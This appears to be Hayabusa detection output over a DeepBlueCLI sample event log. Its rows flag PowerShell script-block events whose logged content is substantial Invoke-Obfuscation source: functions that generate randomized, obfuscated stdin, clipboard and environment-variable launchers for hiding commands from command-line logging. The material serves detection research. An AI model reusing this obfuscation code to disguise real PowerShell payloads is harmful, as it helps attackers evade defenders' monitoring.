$InvokeOption = Out-ObfuscatedTokenCommand -ScriptBlock ([ScriptBlock]::Create($InvokeOption)) 'RandomWhitespace' 1 } # For obfuscated commands generated for $InvokeOption syntax, single-escape & < > and | characters for cmd.exe. ForEach($Char in @('<','>','|','&')) { # Remove single escaping and then escape all characters. This will handle single-escaped and not-escaped characters. If($InvokeOption.Contains(""$Char"")) { $InvokeOption = $InvokeOption.Replace(""$Char"",""^$Char"") } } # Escape double-quote with backslash for powershell.exe. If($InvokeOption.Contains('""')) { $InvokeOption = $InvokeOption.Replace('""','\""') } Return $InvokeOption } Function Out-RandomPowerShellStdInInvokeSyntax { <# .SYNOPSIS HELPER FUNCTION :: Generates randomized PowerShell syntax for invoking a command passed to powershell.exe via standard input. Invoke-Obfuscation Function: Out-RandomPowerShellStdInInvokeSyntax Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Out-ObfuscatedTokenCommand, Out-EncapsulatedInvokeExpression (found in Out-ObfuscatedStringCommand.ps1) Optional Dependencies: None .DESCRIPTION Out-RandomPowerShellStdInInvokeSyntax generates random PowerShell syntax for invoking a command passed to powershell.exe via standard input. This technique is included to show the Blue Team that powershell.exe's command line arguments may not contain any contents of the command itself, but these could be stored in the parent process if passed to powershell.exe via standard input. .EXAMPLE C:\PS> Out-RandomPowerShellStdInInvokeSyntax ( ^& ('v'+( 'aR'+ 'Iabl' ) + 'E' ) ('exE'+'CUTiOnco' +'n'+ 'TeX' + 't' ) -Val).\""INvOKec`oMm`A`ND\"".\""invO`K`es`CRiPt\""(${I`N`puT} ) .NOTES This cmdlet is a helper function for Out-PowerShellLauncher's more sophisticated $LaunchType options where the PowerShell command is passed to powershell.exe via standard input for command line obfuscation benefits. This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> # Build out random PowerShell stdin syntax like: # | powershell - <-- default to this if $NoExit flag is defined because this will cause an error for the other options # | powershell IEX $Input # | powershell $ExecutionContext.InvokeCommand.InvokeScript($Input) # Also including numerous ways to invoke with $ExecutionContext as a variable, including Get-Variable varname, Get-ChildItem Variable:varname, Get-Item Variable:varname, etc. $ExecContextVariables = @() $ExecContextVariables += '(' + (Get-Random -Input @('DIR','Get-ChildItem','GCI','ChildItem','LS','Get-Item','GI','Item')) + ' ' + ""'variable:"" + (Get-Random -Input @('ex*xt','ExecutionContext')) + ""').Value"" $ExecContextVariables += '(' + (Get-Random -Input @('Get-Variable','GV','Variable')) + ' ' + ""'"" + (Get-Random -Input @('ex*xt','ExecutionContext')) + ""'"" + (Get-Random -Input (').Value',(' ' + ('-ValueOnly'.SubString(0,(Get-Random -Minimum 3 -Maximum ('-ValueOnly'.Length+1)))) + ')'))) # Select random option from above. $ExecContextVariable = (Get-Random -Input $ExecContextVariables) $RandomInputVariable = (Get-Random -Input @('$Input','${Input}')) # Generate random invoke operation syntax. # 50% split between using $ExecutionContext invocation syntax versus IEX/Invoke-Expression/variable-obfuscated-'iex' syntax generated by Out-EncapsulatedInvokeExpression. $ExpressionToInvoke = $RandomInputVariable If(Get-Random -Input @(0..1)) { # Randomly decide on invoke operation since we've applied an additional layer of string manipulation in above steps. $InvokeOption = Out-EncapsulatedInvokeExpression $ExpressionToInvoke } Else { $InvokeOption = (Get-Random -Input @('$ExecutionContext','${ExecutionContext}',$ExecContextVariable)) + '.InvokeCommand.InvokeScript(' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $ExpressionToInvoke + ' '*(Get-Random -Minimum 0 -Maximum 3) + ')' } # Random case of $InvokeOption. $InvokeOption = ([Char[]]$InvokeOption.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # If $NoExit flag is defined in calling function then default to - stdin syntax. It will cause errors for other syntax options. If($NoExit) { $InvokeOption = '-' } # Set $PowerShellStdIn to value of $InvokeOption. $PowerShellStdIn = $InvokeOption # Random case of $PowerShellStdIn. $PowerShellStdIn = ([Char[]]$PowerShellStdIn.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Run random PowerShell Stdin operation through the appropriate token obfuscators. If($PowerShellStdIn -ne '-') { # Run through all available token obfuscation functions in random order. $InvokeOption = Out-ObfuscatedTokenCommand -ScriptBlock ([ScriptBlock]::Create($InvokeOption)) $InvokeOption = Out-ObfuscatedTokenCommand -ScriptBlock ([ScriptBlock]::Create($InvokeOption)) 'RandomWhitespace' 1 } # For obfuscated commands generated for $PowerShellStdIn syntax, single-escape & < > and | characters for cmd.exe. ForEach($Char in @('<','>','|','&')) { # Remove single escaping and then escape all characters. This will handle single-escaped and not-escaped characters. If($PowerShellStdIn.Contains(""$Char"")) { $PowerShellStdIn = $PowerShellStdIn.Replace(""$Char"",""^$Char"") } } # Escape double-quote with backslash for powershell.exe. If($PowerShellStdIn.Contains('""')) { $PowerShellStdIn = $PowerShellStdIn.Replace('""','\""') } Return $PowerShellStdIn } Function Out-RandomClipboardInvokeSyntax { <# .SYNOPSIS HELPER FUNCTION :: Generates randomized PowerShell syntax for invoking a command stored in the clipboard. Invoke-Obfuscation Function: Out-RandomClipboardInvokeSyntax Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Out-ObfuscatedTokenCommand, Out-EncapsulatedInvokeExpression (found in Out-ObfuscatedStringCommand.ps1) Optional Dependencies: None .DESCRIPTION Out-RandomClipboardInvokeSyntax generates random PowerShell syntax for invoking a command stored in the clipboard. This technique is included to show the Blue Team that powershell.exe's command line arguments may not contain any contents of the command itself, but these could be stored in the parent/grandparent process if passed to powershell.exe via clipboard. .EXAMPLE C:\PS> Out-RandomClipboardInvokeSyntax . ( \""{0}{1}\"" -f( \""{1}{0}\""-f 'p','Add-Ty' ),'e' ) -AssemblyName ( \""{1}{0}{3}{2}\""-f ( \""{2}{0}{3}{1}\""-f'Wi','dows.Fo','em.','n'),(\""{1}{0}\""-f 'yst','S'),'s','rm' ) ; (.( \""{0}\"" -f'GV' ) (\""{2}{3}{1}{0}{4}\"" -f 'E','onCoNT','EXEC','UTi','XT')).\""Va`LuE\"".\""inVOK`Ec`OMmANd\"".\""inVOKe`SC`RIpT\""(( [sYsTEM.WInDOwS.foRMS.ClIPbOard]::( \""{1}{0}\""-f (\""{2}{1}{0}\"" -f'XT','tTE','e'),'g').Invoke( ) ) ) ;[System.Windows.Forms.Clipboard]::( \""{1}{0}\""-f'ar','Cle' ).Invoke( ) .NOTES This cmdlet is a helper function for Out-PowerShellLauncher's more sophisticated $LaunchType options where the PowerShell command is passed to powershell.exe via clipboard for command line obfuscation benefits. This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> # Set variables necessary for loading appropriate class/type to be able to interact with the clipboard. $ReflectionAssembly = Get-Random -Input @('System.Reflection.Assembly','Reflection.Assembly') $WindowsClipboard = Get-Random -Input @('Windows.Clipboard','System.Windows.Clipboard') $WindowsFormsClipboard = Get-Random -Input @('System.Windows.Forms.Clipboard','Windows.Forms.Clipboard') # Randomly select flag argument substring for Add-Type -AssemblyCore. $FullArgument = ""-AssemblyName"" # Take into account the shorted flag of -AN as well. $AssemblyNameFlags = @() $AssemblyNameFlags += '-AN' For($Index=2; $Index -le $FullArgument.Length; $Index++) { $AssemblyNameFlags += $FullArgument.SubString(0,$Index) } $AssemblyNameFlag = Get-Random -Input $AssemblyNameFlags # Characters we will use to generate random variable name. # For simplicity do NOT include single- or double-quotes in this array. $CharsToRandomVarName = @(0..9) $CharsToRandomVarName += @('A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z') # Randomly choose variable name starting length. $RandomVarLength = (Get-Random -Input @(3..6)) # Create random variable with characters from $CharsToRandomVarName. If($CharsToRandomVarName.Count -lt $RandomVarLength) {$RandomVarLength = $CharsToRandomVarName.Count} $RandomVarName = ((Get-Random -Input $CharsToRandomVarName -Count $RandomVarLength) -Join '').Replace(' ','') # Generate random variable name. $RandomVarName = ((Get-Random -Input $CharsToRandomVarName -Count $RandomVarLength) -Join '').Replace(' ','') # Generate paired random syntax options for: A) loading necessary class/assembly, B) retrieving contents from clipboard, and C) clearing/overwritting clipboard contents. $RandomClipSyntaxValue = Get-Random -Input @(1..3) Switch($RandomClipSyntaxValue) { 1 {",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.296 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"e the PowerShell command is set in process-level environment variables for command line obfuscation benefits. This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0)] [ValidateNotNullOrEmpty()] [String[]] $EnvVarName ) # Retrieve random variable from variable name array passed in as argument. $EnvVarName = Get-Random -Input $EnvVarName # Generate numerous ways to invoke with $ExecutionContext as a variable, including Get-Variable varname, Get-ChildItem Variable:varname, Get-Item Variable:varname, etc. $ExecContextVariables = @() $ExecContextVariables += '(' + (Get-Random -Input @('DIR','Get-ChildItem','GCI','ChildItem','LS','Get-Item','GI','Item')) + ' ' + ""'variable:"" + (Get-Random -Input @('ex*xt','ExecutionContext')) + ""').Value"" $ExecContextVariables += '(' + (Get-Random -Input @('Get-Variable','GV','Variable')) + ' ' + ""'"" + (Get-Random -Input @('ex*xt','ExecutionContext')) + ""'"" + (Get-Random -Input (').Value',(' ' + ('-ValueOnly'.SubString(0,(Get-Random -Minimum 3 -Maximum ('-ValueOnly'.Length+1)))) + ')'))) # Select random option from above. $ExecContextVariable = Get-Random -Input $ExecContextVariables # Generate numerous ways to invoke command stored in environment variable. $GetRandomVariableSyntax = @() $GetRandomVariableSyntax += '(' + (Get-Random -Input @('DIR','Get-ChildItem','GCI','ChildItem','LS','Get-Item','GI','Item')) + ' ' + 'env:' + $EnvVarName + ').Value' $GetRandomVariableSyntax += ('(' + '[Environment]::GetEnvironmentVariable(' + ""'$EnvVarName'"" + ',' + ""'Process'"" + ')' + ')') # Select random option from above. $GetRandomVariableSyntax = Get-Random -Input $GetRandomVariableSyntax # Generate random invoke operation syntax. # 50% split between using $ExecutionContext invocation syntax versus IEX/Invoke-Expression/variable-obfuscated-'iex' syntax generated by Out-EncapsulatedInvokeExpression. $ExpressionToInvoke = $GetRandomVariableSyntax If(Get-Random -Input @(0..1)) { # Randomly decide on invoke operation since we've applied an additional layer of string manipulation in above steps. $InvokeOption = Out-EncapsulatedInvokeExpression $ExpressionToInvoke } Else { $InvokeOption = (Get-Random -Input @('$ExecutionContext','${ExecutionContext}',$ExecContextVariable)) + '.InvokeCommand.InvokeScript(' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $ExpressionToInvoke + ' '*(Get-Random -Minimum 0 -Maximum 3) + ')' } # Random case of $InvokeOption. $InvokeOption = ([Char[]]$InvokeOption.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Run random invoke operation through the appropriate token obfuscators if $PowerShellStdIn is not simply a value of - from above random options. If($InvokeOption -ne '-') { # Run through all available token obfuscation functions in random order. $InvokeOption = Out-ObfuscatedTokenCommand -ScriptBlock ([ScriptBlock]::Create($InvokeOption)) $InvokeOption = Out-ObfuscatedTokenCommand -ScriptBlock ([ScriptBlock]::Create($InvokeOption)) 'RandomWhitespace' 1 } # For obfuscated commands generated for $InvokeOption syntax, single-escape & < > and | characters for cmd.exe. ForEach($Char in @('<','>','|','&')) { # Remove single escaping and then escape all characters. This will handle single-escaped and not-escaped characters. If($InvokeOption.Contains(""$Char"")) { $InvokeOption = $InvokeOption.Replace(""$Char"",""^$Char"") } } # Escape double-quote with backslash for powershell.exe. If($InvokeOption.Contains('""')) { $InvokeOption = $InvokeOption.Replace('""','\""') } Return $InvokeOption } Function Out-RandomPowerShellStdInInvokeSyntax { <# .SYNOPSIS HELPER FUNCTION :: Generates randomized PowerShell syntax for invoking a command passed to powershell.exe via standard input. Invoke-Obfuscation Function: Out-RandomPowerShellStdInInvokeSyntax Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Out-ObfuscatedTokenCommand, Out-EncapsulatedInvokeExpression (found in Out-ObfuscatedStringCommand.ps1) Optional Dependencies: None .DESCRIPTION Out-RandomPowerShellStdInInvokeSyntax generates random PowerShell syntax for invoking a command passed to powershell.exe via standard input. This technique is included to show the Blue Team that powershell.exe's command line arguments may not contain any contents of the command itself, but these could be stored in the parent process if passed to powershell.exe via standard input. .EXAMPLE C:\PS> Out-RandomPowerShellStdInInvokeSyntax ( ^& ('v'+( 'aR'+ 'Iabl' ) + 'E' ) ('exE'+'CUTiOnco' +'n'+ 'TeX' + 't' ) -Val).\""INvOKec`oMm`A`ND\"".\""invO`K`es`CRiPt\""(${I`N`puT} ) .NOTES This cmdlet is a helper function for Out-PowerShellLauncher's more sophisticated $LaunchType options where the PowerShell command is passed to powershell.exe via standard input for command line obfuscation benefits. This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> # Build out random PowerShell stdin syntax like: # | powershell - <-- default to this if $NoExit flag is defined because this will cause an error for the other options # | powershell IEX $Input # | powershell $ExecutionContext.InvokeCommand.InvokeScript($Input) # Also including numerous ways to invoke with $ExecutionContext as a variable, including Get-Variable varname, Get-ChildItem Variable:varname, Get-Item Variable:varname, etc. $ExecContextVariables = @() $ExecContextVariables += '(' + (Get-Random -Input @('DIR','Get-ChildItem','GCI','ChildItem','LS','Get-Item','GI','Item')) + ' ' + ""'variable:"" + (Get-Random -Input @('ex*xt','ExecutionContext')) + ""').Value"" $ExecContextVariables += '(' + (Get-Random -Input @('Get-Variable','GV','Variable')) + ' ' + ""'"" + (Get-Random -Input @('ex*xt','ExecutionContext')) + ""'"" + (Get-Random -Input (').Value',(' ' + ('-ValueOnly'.SubString(0,(Get-Random -Minimum 3 -Maximum ('-ValueOnly'.Length+1)))) + ')'))) # Select random option from above. $ExecContextVariable = (Get-Random -Input $ExecContextVariables) $RandomInputVariable = (Get-Random -Input @('$Input','${Input}')) # Generate random invoke operation syntax. # 50% split between using $ExecutionContext invocation syntax versus IEX/Invoke-Expression/variable-obfuscated-'iex' syntax generated by Out-EncapsulatedInvokeExpression. $ExpressionToInvoke = $RandomInputVariable If(Get-Random -Input @(0..1)) { # Randomly decide on invoke operation since we've applied an additional layer of string manipulation in above steps. $InvokeOption = Out-EncapsulatedInvokeExpression $ExpressionToInvoke } Else { $InvokeOption = (Get-Random -Input @('$ExecutionContext','${ExecutionContext}',$ExecContextVariable)) + '.InvokeCommand.InvokeScript(' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $ExpressionToInvoke + ' '*(Get-Random -Minimum 0 -Maximum 3) + ')' } # Random case of $InvokeOption. $InvokeOption = ([Char[]]$InvokeOption.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # If $NoExit flag is defined in calling function then default to - stdin syntax. It will cause errors for other syntax options. If($NoExit) { $InvokeOption = '-' } # Set $PowerShellStdIn to value of $InvokeOption. $PowerShellStdIn = $InvokeOption # Random case of $PowerShellStdIn. $PowerShellStdIn = ([Char[]]$PowerShellStdIn.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Run random PowerShell Stdin operation through the appropriate token obfuscators. If($PowerShellStdIn -ne '-') { # Run through all available token obfuscation functions in random order. $InvokeOption = Out-ObfuscatedTokenCommand -ScriptBlock ([ScriptBlock]::Create($InvokeOption)) $InvokeOption = Out-ObfuscatedTokenCommand -ScriptBlock ([ScriptBlock]::Create($InvokeOption)) 'RandomWhitespace' 1 } # For obfuscated commands generated for $PowerShellStdIn syntax, single-escape & < > and | characters for cmd.exe. ForEach($Char in @('<','>','|','&')) { # Remove single escaping and then escape all characters. This will handle single-escaped and not-escaped characters. If($PowerShellStdIn.Contains(""$Char"")) { $PowerShellStdIn = $PowerShellStdIn.Replace(""$Char"",""^$Char"") } } # Escape double-quote with backslash for powershell.exe. If($PowerShellStdIn.Contains('""')) { $PowerShellStdIn = $PowerShellStdIn.Replace('""','\""') } Return $PowerShellStdIn } Function Out-RandomClipboardInvokeSyntax { <# .SYNOPSIS HELPER FUNCTION :: Generates randomized PowerShell syntax for invoking a command stored in the clipboard. Invoke-Obfuscation Function: Out-RandomClipboardInvokeSyntax Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Out-ObfuscatedTokenCommand, Out-EncapsulatedInvokeExpression (found in Out-ObfuscatedStringCommand.ps1) Optional Dependencies: None .DESCRIPTION Out-RandomClipboardInvokeSyntax generates random PowerShell syntax for invoking a command stored in the clipboard. This technique is included to show the Blue Team that powershell.exe's command line arguments may not contain any contents of the command itself, but these could be stored in the parent/grandparent process if passed to powershell.exe via clipboard. .EXAMPLE C:\PS> Out-RandomClipboardInvokeSyntax . ( \""{0}{1}\"" -f( \""{1}{0}\""-f 'p','Add-Ty' ),'e' ) -AssemblyName ( \""{1}{0}{3}{2}\""-f ( \""{2}{0}{3}{1}\""-f'Wi','dows.Fo','em.','n'),(\""{1}{0}\""-f 'yst','S'),'s','rm' ) ; (.( \""{0}\"" -f'GV' ) (\""{2}{3}{1}{0}{4}\"" -f 'E','onCoNT','EXEC','UTi','XT')).\""Va`LuE\"".\""inVOK`Ec`OMmANd\"".\""inVOKe`SC`RIpT\""(( [sYsTEM.WInDOwS.foRMS.ClIPbOard]::( \""{1}{0}\""-f (\""{2}{1}{0}\"" -f'XT','tTE','e'),'g').Invoke( ) ) ) ;[System.Windows.Forms.Clipboard]::( \""{1}{0}\""-f'ar','Cle' ).Invoke( ) .NOTES This cmdlet is a helper function for Out-PowerShellLauncher's more sophisticated $LaunchType options where the PowerShell command is passed to powershell.exe via clipboard for command line obfuscation benefits. This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> # Set variables necessary for loading appropriate class/type to be able to interact with the clipboard. $ReflectionAssembly = Get-Random -Input @('System.Reflection.Assembly','Reflection.Assembly') $WindowsClipboard = Get-Random -Input @('Windows.Clipboard','System.Windows.Clipboard') $WindowsFormsClipboard = Get-Random -Input @('System.Windows.Forms.Clipboard','Windows.Forms.Clipboard') # Randomly select flag argument substring for Add-Type -AssemblyCore. $FullArgument = ""-AssemblyName"" # Take into account the shorted flag of -AN as well. $AssemblyNameFlags = @() $AssemblyNameFlags += '-AN' For($Index=2; $Index -le $FullArgument.Length; $Index++) { $AssemblyNameFlags += $FullArgument.SubString(0,$Index) } $AssemblyNameFlag = Get-Random -Input $AssemblyNameFlags # Characters we will use to generate random variable name. # For simplicity do NOT include single- or double-quotes in this array. $CharsToRandomVarName = @(0..9) $CharsToRandomVarName += @('A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z') # Randomly choose variable name starting length. $RandomVarLength = (Get-Random -Input @(3..6)) # Create random variable with characters from $CharsToRandomVarName. If($CharsToRandomVarName.Count -lt $RandomVarLength) {$RandomVarLength = $CharsToRandomVarName.Count} $RandomVarName = ((Get-Random -Input $CharsToRandomVarName -Count $RandomVarLength) -Join '').Replace(' ','') # Generate random variable name. $RandomVarName = ((Get-Random -Input $CharsToRandomVarName -Count $RandomVarLength) -Join '').Replace(' ','') # Generate paired random syntax options for: A) loading necessary class/assembly, B) retrieving contents from clipboard, and C) clearing/overwritting clipboard contents. $RandomClipSyntaxValue = Get-Random -Input @(1..3) Switch($RandomClipSyntaxValue) { 1 {",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.296 +00:00,SEC511,4104,medium,,Potentially Malicious PwSh,"$LoadClipboardClassOption = ""Add-Type $AssemblyNameFlag PresentationCore"" $GetClipboardContentsOption = ""([$WindowsClipboard]::GetText())"" $ClearClipboardOption = ""[$WindowsClipboard]::"" + (Get-Random -Input @('Clear()',""SetText(' ')"")) } 2 { $LoadClipboardClassOption = ""Add-Type $AssemblyNameFlag System.Windows.Forms"" $GetClipboardContentsOption = ""([$WindowsFormsClipboard]::GetText())"" $ClearClipboardOption = ""[$WindowsFormsClipboard]::"" + (Get-Random -Input @('Clear()',""SetText(' ')"")) } 3 { $LoadClipboardClassOption = (Get-Random -Input @('[Void]','$NULL=',""`$$RandomVarName="")) + ""[$ReflectionAssembly]::LoadWithPartialName('System.Windows.Forms')"" $GetClipboardContentsOption = ""([$WindowsFormsClipboard]::GetText())"" $ClearClipboardOption = ""[$WindowsFormsClipboard]::"" + (Get-Random -Input @('Clear()',""SetText(' ')"")) } default {Write-Error ""An invalid RandomClipSyntaxValue value ($RandomClipSyntaxValue) was passed to switch block for Out-RandomClipboardInvokeSyntax.""; Exit;} } # Generate syntax options for invoking clipboard contents, including numerous ways to invoke with $ExecutionContext as a variable, including Get-Variable varname, Get-ChildItem Variable:varname, Get-Item Variable:varname, etc. $ExecContextVariables = @() $ExecContextVariables += '(' + (Get-Random -Input @('DIR','Get-ChildItem','GCI','ChildItem','LS','Get-Item','GI','Item')) + ' ' + ""'variable:"" + (Get-Random -Input @('ex*xt','ExecutionContext')) + ""').Value"" $ExecContextVariables += '(' + (Get-Random -Input @('Get-Variable','GV','Variable')) + ' ' + ""'"" + (Get-Random -Input @('ex*xt','ExecutionContext')) + ""'"" + (Get-Random -Input (').Value',(' ' + ('-ValueOnly'.SubString(0,(Get-Random -Minimum 3 -Maximum ('-ValueOnly'.Length+1)))) + ')'))) # Select random option from above. $ExecContextVariable = Get-Random -Input $ExecContextVariables # Generate random invoke operation syntax. # 50% split between using $ExecutionContext invocation syntax versus IEX/Invoke-Expression/variable-obfuscated-'iex' syntax generated by Out-EncapsulatedInvokeExpression. $ExpressionToInvoke = $GetClipboardContentsOption If(Get-Random -Input @(0..1)) { # Randomly decide on invoke operation since we've applied an additional layer of string manipulation in above steps. $InvokeOption = Out-EncapsulatedInvokeExpression $ExpressionToInvoke } Else { $InvokeOption = (Get-Random -Input @('$ExecutionContext','${ExecutionContext}',$ExecContextVariable)) + '.InvokeCommand.InvokeScript(' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $ExpressionToInvoke + ' '*(Get-Random -Minimum 0 -Maximum 3) + ')' } # Random case of $InvokeOption. $InvokeOption = ([Char[]]$InvokeOption.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Set final syntax for invoking clipboard contents. $PowerShellClip = $LoadClipboardClassOption + ' '*(Get-Random -Minimum 0 -Maximum 3) + ';' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $InvokeOption # Add syntax for clearing clipboard contents. $PowerShellClip = $PowerShellClip + ' '*(Get-Random -Minimum 0 -Maximum 3) + ';' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $ClearClipboardOption # Run through all relevant token obfuscation functions except Type since it causes error for direct type casting relevant classes in a non-interactive PowerShell session. $PowerShellClip = Out-ObfuscatedTokenCommand -ScriptBlock ([ScriptBlock]::Create($PowerShellClip)) 'Member' $PowerShellClip = Out-ObfuscatedTokenCommand -ScriptBlock ([ScriptBlock]::Create($PowerShellClip)) 'Member' $PowerShellClip = Out-ObfuscatedTokenCommand -ScriptBlock ([ScriptBlock]::Create($PowerShellClip)) 'Command' $PowerShellClip = Out-ObfuscatedTokenCommand -ScriptBlock ([ScriptBlock]::Create($PowerShellClip)) 'CommandArgument' $PowerShellClip = Out-ObfuscatedTokenCommand -ScriptBlock ([ScriptBlock]::Create($PowerShellClip)) 'Variable' $PowerShellClip = Out-ObfuscatedTokenCommand -ScriptBlock ([ScriptBlock]::Create($PowerShellClip)) 'String' $PowerShellClip = Out-ObfuscatedTokenCommand -ScriptBlock ([ScriptBlock]::Create($PowerShellClip)) 'RandomWhitespace' # For obfuscated commands generated for $PowerShellClip syntax, single-escape & < > and | characters for cmd.exe. ForEach($Char in @('<','>','|','&')) { # Remove single escaping and then escape all characters. This will handle single-escaped and not-escaped characters. If($PowerShellClip.Contains(""$Char"")) { $PowerShellClip = $PowerShellClip.Replace(""$Char"",""^$Char"") } } # Escape double-quote with backslash for powershell.exe. If($PowerShellClip.Contains('""')) { $PowerShellClip = $PowerShellClip.Replace('""','\""') } Return $PowerShellClip }",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.296 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"$LoadClipboardClassOption = ""Add-Type $AssemblyNameFlag PresentationCore"" $GetClipboardContentsOption = ""([$WindowsClipboard]::GetText())"" $ClearClipboardOption = ""[$WindowsClipboard]::"" + (Get-Random -Input @('Clear()',""SetText(' ')"")) } 2 { $LoadClipboardClassOption = ""Add-Type $AssemblyNameFlag System.Windows.Forms"" $GetClipboardContentsOption = ""([$WindowsFormsClipboard]::GetText())"" $ClearClipboardOption = ""[$WindowsFormsClipboard]::"" + (Get-Random -Input @('Clear()',""SetText(' ')"")) } 3 { $LoadClipboardClassOption = (Get-Random -Input @('[Void]','$NULL=',""`$$RandomVarName="")) + ""[$ReflectionAssembly]::LoadWithPartialName('System.Windows.Forms')"" $GetClipboardContentsOption = ""([$WindowsFormsClipboard]::GetText())"" $ClearClipboardOption = ""[$WindowsFormsClipboard]::"" + (Get-Random -Input @('Clear()',""SetText(' ')"")) } default {Write-Error ""An invalid RandomClipSyntaxValue value ($RandomClipSyntaxValue) was passed to switch block for Out-RandomClipboardInvokeSyntax.""; Exit;} } # Generate syntax options for invoking clipboard contents, including numerous ways to invoke with $ExecutionContext as a variable, including Get-Variable varname, Get-ChildItem Variable:varname, Get-Item Variable:varname, etc. $ExecContextVariables = @() $ExecContextVariables += '(' + (Get-Random -Input @('DIR','Get-ChildItem','GCI','ChildItem','LS','Get-Item','GI','Item')) + ' ' + ""'variable:"" + (Get-Random -Input @('ex*xt','ExecutionContext')) + ""').Value"" $ExecContextVariables += '(' + (Get-Random -Input @('Get-Variable','GV','Variable')) + ' ' + ""'"" + (Get-Random -Input @('ex*xt','ExecutionContext')) + ""'"" + (Get-Random -Input (').Value',(' ' + ('-ValueOnly'.SubString(0,(Get-Random -Minimum 3 -Maximum ('-ValueOnly'.Length+1)))) + ')'))) # Select random option from above. $ExecContextVariable = Get-Random -Input $ExecContextVariables # Generate random invoke operation syntax. # 50% split between using $ExecutionContext invocation syntax versus IEX/Invoke-Expression/variable-obfuscated-'iex' syntax generated by Out-EncapsulatedInvokeExpression. $ExpressionToInvoke = $GetClipboardContentsOption If(Get-Random -Input @(0..1)) { # Randomly decide on invoke operation since we've applied an additional layer of string manipulation in above steps. $InvokeOption = Out-EncapsulatedInvokeExpression $ExpressionToInvoke } Else { $InvokeOption = (Get-Random -Input @('$ExecutionContext','${ExecutionContext}',$ExecContextVariable)) + '.InvokeCommand.InvokeScript(' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $ExpressionToInvoke + ' '*(Get-Random -Minimum 0 -Maximum 3) + ')' } # Random case of $InvokeOption. $InvokeOption = ([Char[]]$InvokeOption.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Set final syntax for invoking clipboard contents. $PowerShellClip = $LoadClipboardClassOption + ' '*(Get-Random -Minimum 0 -Maximum 3) + ';' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $InvokeOption # Add syntax for clearing clipboard contents. $PowerShellClip = $PowerShellClip + ' '*(Get-Random -Minimum 0 -Maximum 3) + ';' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $ClearClipboardOption # Run through all relevant token obfuscation functions except Type since it causes error for direct type casting relevant classes in a non-interactive PowerShell session. $PowerShellClip = Out-ObfuscatedTokenCommand -ScriptBlock ([ScriptBlock]::Create($PowerShellClip)) 'Member' $PowerShellClip = Out-ObfuscatedTokenCommand -ScriptBlock ([ScriptBlock]::Create($PowerShellClip)) 'Member' $PowerShellClip = Out-ObfuscatedTokenCommand -ScriptBlock ([ScriptBlock]::Create($PowerShellClip)) 'Command' $PowerShellClip = Out-ObfuscatedTokenCommand -ScriptBlock ([ScriptBlock]::Create($PowerShellClip)) 'CommandArgument' $PowerShellClip = Out-ObfuscatedTokenCommand -ScriptBlock ([ScriptBlock]::Create($PowerShellClip)) 'Variable' $PowerShellClip = Out-ObfuscatedTokenCommand -ScriptBlock ([ScriptBlock]::Create($PowerShellClip)) 'String' $PowerShellClip = Out-ObfuscatedTokenCommand -ScriptBlock ([ScriptBlock]::Create($PowerShellClip)) 'RandomWhitespace' # For obfuscated commands generated for $PowerShellClip syntax, single-escape & < > and | characters for cmd.exe. ForEach($Char in @('<','>','|','&')) { # Remove single escaping and then escape all characters. This will handle single-escaped and not-escaped characters. If($PowerShellClip.Contains(""$Char"")) { $PowerShellClip = $PowerShellClip.Replace(""$Char"",""^$Char"") } } # Escape double-quote with backslash for powershell.exe. If($PowerShellClip.Contains('""')) { $PowerShellClip = $PowerShellClip.Replace('""','\""') } Return $PowerShellClip 